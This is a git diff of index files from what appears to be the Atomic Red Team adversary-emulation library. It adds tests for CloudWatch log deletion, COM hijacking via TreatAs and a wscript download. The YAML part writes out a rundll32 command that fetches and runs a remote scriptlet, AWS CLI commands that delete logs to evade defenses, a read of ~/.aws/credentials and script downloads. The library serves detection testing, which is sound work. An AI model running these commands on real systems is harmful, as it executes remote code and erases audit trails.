diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 5b5e00cc..aa9702c5 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -1,5 +1,5 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
-defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt
+defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt
defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt
@@ -359,6 +359,8 @@ defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-2
defense-evasion,T1562.008,Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell
defense-evasion,T1562.008,Disable Cloud Logs,3,Office 365 - Exchange Audit Log Disabled,1ee572f3-056c-4632-a7fc-7e7c42b1543c,powershell
defense-evasion,T1562.008,Disable Cloud Logs,4,Disable CloudTrail Logging Through Event Selectors via Stratus,a27418de-bdce-4ebd-b655-38f11142bf0c,sh
+defense-evasion,T1562.008,Disable Cloud Logs,5,AWS CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
+defense-evasion,T1562.008,Disable Cloud Logs,6,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
@@ -530,6 +532,7 @@ privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,b
privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
privilege-escalation,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
+privilege-escalation,T1546.015,Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
privilege-escalation,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
@@ -755,6 +758,7 @@ persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4
persistence,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
persistence,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
persistence,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
+persistence,T1546.015,Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt
persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
@@ -842,7 +846,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell
lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
-lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
+lateral-movement,T1021.006,Windows Remote Management,2,Remote Code Execution with PS Credentials Using Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
@@ -1251,6 +1255,7 @@ command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Lin
command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt
command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt
command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
@@ -1288,6 +1293,7 @@ impact,T1529,System Shutdown/Reboot,6,Shutdown System via `halt` - Linux,918f70a
impact,T1529,System Shutdown/Reboot,7,Reboot System via `halt` - Linux,78f92e14-f1e9-4446-b3e9-f1b921f2459e,bash
impact,T1529,System Shutdown/Reboot,8,Shutdown System via `poweroff` - Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,bash
impact,T1529,System Shutdown/Reboot,9,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
+impact,T1529,System Shutdown/Reboot,10,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
initial-access,T1566.001,Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index d2f57b64..d2195c8f 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -77,6 +77,8 @@ defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-2
defense-evasion,T1562.008,Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell
defense-evasion,T1562.008,Disable Cloud Logs,3,Office 365 - Exchange Audit Log Disabled,1ee572f3-056c-4632-a7fc-7e7c42b1543c,powershell
defense-evasion,T1562.008,Disable Cloud Logs,4,Disable CloudTrail Logging Through Event Selectors via Stratus,a27418de-bdce-4ebd-b655-38f11142bf0c,sh
+defense-evasion,T1562.008,Disable Cloud Logs,5,AWS CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
+defense-evasion,T1562.008,Disable Cloud Logs,6,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1070.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index c6268bef..f024778f 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -1,5 +1,5 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
-defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt
+defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt
defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt
@@ -394,6 +394,7 @@ privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,b
privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
privilege-escalation,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
+privilege-escalation,T1546.015,Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
@@ -551,6 +552,7 @@ persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4
persistence,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
persistence,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
persistence,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
+persistence,T1546.015,Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt
persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
@@ -602,7 +604,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell
lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
-lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
+lateral-movement,T1021.006,Windows Remote Management,2,Remote Code Execution with PS Credentials Using Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
@@ -907,6 +909,7 @@ command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Lin
command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt
command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt
command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
@@ -929,6 +932,7 @@ impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1
impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
+impact,T1529,System Shutdown/Reboot,10,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
initial-access,T1566.001,Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index fdabd1a3..c5e4ac8c 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -527,6 +527,8 @@
- Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
- Atomic Test #3: Office 365 - Exchange Audit Log Disabled [office-365]
- Atomic Test #4: Disable CloudTrail Logging Through Event Selectors via Stratus [linux, macos]
+ - Atomic Test #5: AWS CloudWatch Log Group Deletes [iaas:aws]
+ - Atomic Test #6: AWS CloudWatch Log Stream Deletes [iaas:aws]
- [T1564.003 Hidden Window](../../T1564.003/T1564.003.md)
- Atomic Test #1: Hidden Window [windows]
- T1147 Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -841,6 +843,7 @@
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
+ - Atomic Test #4: COM hijacking via TreatAs [windows]
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1281,6 +1284,7 @@
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
+ - Atomic Test #4: COM hijacking via TreatAs [windows]
- [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md)
- Atomic Test #1: Install Outlook Home Page Persistence [windows]
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
@@ -1463,7 +1467,7 @@
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1021.006 Windows Remote Management](../../T1021.006/T1021.006.md)
- Atomic Test #1: Enable Windows Remote Management [windows]
- - Atomic Test #2: Invoke-Command [windows]
+ - Atomic Test #2: Remote Code Execution with PS Credentials Using Invoke-Command [windows]
- Atomic Test #3: WinRM Access with Evil-WinRM [windows]
- [T1021.003 Distributed Component Object Model](../../T1021.003/T1021.003.md)
- Atomic Test #1: PowerShell Lateral Movement using MMC20 [windows]
@@ -2093,6 +2097,7 @@
- Atomic Test #23: Lolbas replace.exe use to copy file [windows]
- Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows]
- Atomic Test #25: certreq download [windows]
+ - Atomic Test #26: Download a file using wscript [windows]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
@@ -2214,6 +2219,7 @@
- Atomic Test #7: Reboot System via `halt` - Linux [linux]
- Atomic Test #8: Shutdown System via `poweroff` - Linux [linux]
- Atomic Test #9: Reboot System via `poweroff` - Linux [linux]
+ - Atomic Test #10: Logoff System - Windows [windows]
# initial-access
- [T1133 External Remote Services](../../T1133/T1133.md)
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index 062a8e2b..6da30745 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -162,6 +162,8 @@
- Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
- Atomic Test #3: Office 365 - Exchange Audit Log Disabled [office-365]
- Atomic Test #4: Disable CloudTrail Logging Through Event Selectors via Stratus [linux, macos]
+ - Atomic Test #5: AWS CloudWatch Log Group Deletes [iaas:aws]
+ - Atomic Test #6: AWS CloudWatch Log Stream Deletes [iaas:aws]
- T1564.003 Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index a57d06c9..a2bcf3fa 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -630,6 +630,7 @@
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
+ - Atomic Test #4: COM hijacking via TreatAs [windows]
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -935,6 +936,7 @@
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
+ - Atomic Test #4: COM hijacking via TreatAs [windows]
- [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md)
- Atomic Test #1: Install Outlook Home Page Persistence [windows]
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
@@ -1058,7 +1060,7 @@
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1021.006 Windows Remote Management](../../T1021.006/T1021.006.md)
- Atomic Test #1: Enable Windows Remote Management [windows]
- - Atomic Test #2: Invoke-Command [windows]
+ - Atomic Test #2: Remote Code Execution with PS Credentials Using Invoke-Command [windows]
- Atomic Test #3: WinRM Access with Evil-WinRM [windows]
- [T1021.003 Distributed Component Object Model](../../T1021.003/T1021.003.md)
- Atomic Test #1: PowerShell Lateral Movement using MMC20 [windows]
@@ -1519,6 +1521,7 @@
- Atomic Test #23: Lolbas replace.exe use to copy file [windows]
- Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows]
- Atomic Test #25: certreq download [windows]
+ - Atomic Test #26: Download a file using wscript [windows]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
@@ -1581,6 +1584,7 @@
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #1: Shutdown System - Windows [windows]
- Atomic Test #2: Restart System - Windows [windows]
+ - Atomic Test #10: Logoff System - Windows [windows]
# initial-access
- [T1133 External Remote Services](../../T1133/T1133.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 186b390a..122b1e3f 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -240,7 +240,7 @@ defense-evasion:
identifier: T1218.011
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
- auto_generated_guid: cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be
+ auto_generated_guid: 57ba4ce9-ee7a-4f27-9928-3c70c489b59d
description: 'Test execution of a remote script using rundll32.exe. Upon execution
notepad.exe will be opened.
@@ -253,7 +253,11 @@ defense-evasion:
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct
executor:
- command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
+ command: 'start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication
+ ";document.write();GetObject("script:#{file_url}").Exec();
+
+ '
+ cleanup_command: 'taskkill /IM notepad.exe /f
'
name: command_prompt
@@ -15727,6 +15731,16 @@ defense-evasion:
get_prereq_command: |
New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
+ - description: 'PPID.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
+
+ '
+ prereq_command: 'if (Test-Path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1)
+ {exit 0} else {exit 1}
+
+ '
+ get_prereq_command: |
+ New-Item -Type Directory (split-path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
executor:
command: |
. $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
@@ -21512,6 +21526,88 @@ defense-evasion:
./stratus cleanup --all
name: sh
elevation_required: false
+ - name: AWS CloudWatch Log Group Deletes
+ auto_generated_guid: 89422c87-b57b-4a04-a8ca-802bb9d06121
+ description: "Creates a new cloudWatch log group in AWS, Upon successful creation
+ it will Delete the group. Attackers can use this technique to evade defenses
+ by \ndeleting the log stream. Once it is deleted, the logs created by the
+ attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion\n"
+ supported_platforms:
+ - iaas:aws
+ input_arguments:
+ cloudwatch_log_group_name:
+ description: Name of the cloudWatch log group
+ type: String
+ default: log-test
+ region:
+ description: Name of the region
+ type: String
+ default: us-east-1
+ dependencies:
+ - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+ '
+ prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+ '
+ get_prereq_command: 'echo Please install the aws-cli and configure your AWS
+ defult profile using: aws configure
+
+ '
+ executor:
+ command: |
+ aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+ echo "*** Log Group Created ***"
+ aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+ echo "*** Log Group Deleted ***"
+ cleanup_command:
+ name: sh
+ elevation_required: false
+ - name: AWS CloudWatch Log Stream Deletes
+ auto_generated_guid: 33ca84bc-4259-4943-bd36-4655dc420932
+ description: "Creates a new cloudWatch log stream in AWS, Upon successful creation
+ it will Delete the stream. Attackers can use this technique to evade defenses
+ by \ndeleting the log stream. Once it is deleted, the logs created by the
+ attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html\n"
+ supported_platforms:
+ - iaas:aws
+ input_arguments:
+ cloudwatch_log_group_name:
+ description: Name of the cloudWatch log group
+ type: String
+ default: test-logs
+ cloudwatch_log_stream_name:
+ description: Name of the cloudWatch log stream
+ type: String
+ default: '20150601'
+ region:
+ description: Name of the region
+ type: String
+ default: us-west-2
+ dependencies:
+ - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+ '
+ prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+ '
+ get_prereq_command: 'echo Please install the aws-cli and configure your AWS
+ defult profile using: aws configure
+
+ '
+ executor:
+ command: |
+ aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+ echo "*** Log Group Created ***"
+ aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+ echo "*** Log Stream Created ***"
+ aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+ echo "*** Log Stream Deleted ***"
+ aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+ echo "*** Log Group Deleted ***"
+ cleanup_command:
+ name: sh
+ elevation_required: false
T1564.003:
technique:
x_mitre_platforms:
@@ -34335,6 +34431,16 @@ privilege-escalation:
get_prereq_command: |
New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
+ - description: 'PPID.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
+
+ '
+ prereq_command: 'if (Test-Path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1)
+ {exit 0} else {exit 1}
+
+ '
+ get_prereq_command: |
+ New-Item -Type Directory (split-path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
executor:
command: |
. $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
@@ -36898,6 +37004,44 @@ privilege-escalation:
cleanup_command: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}'
-Recurse -ErrorAction Ignore
name: powershell
+ - name: COM hijacking via TreatAs
+ auto_generated_guid: 33eacead-f117-4863-8eb0-5c6304fbfaa9
+ description: |-
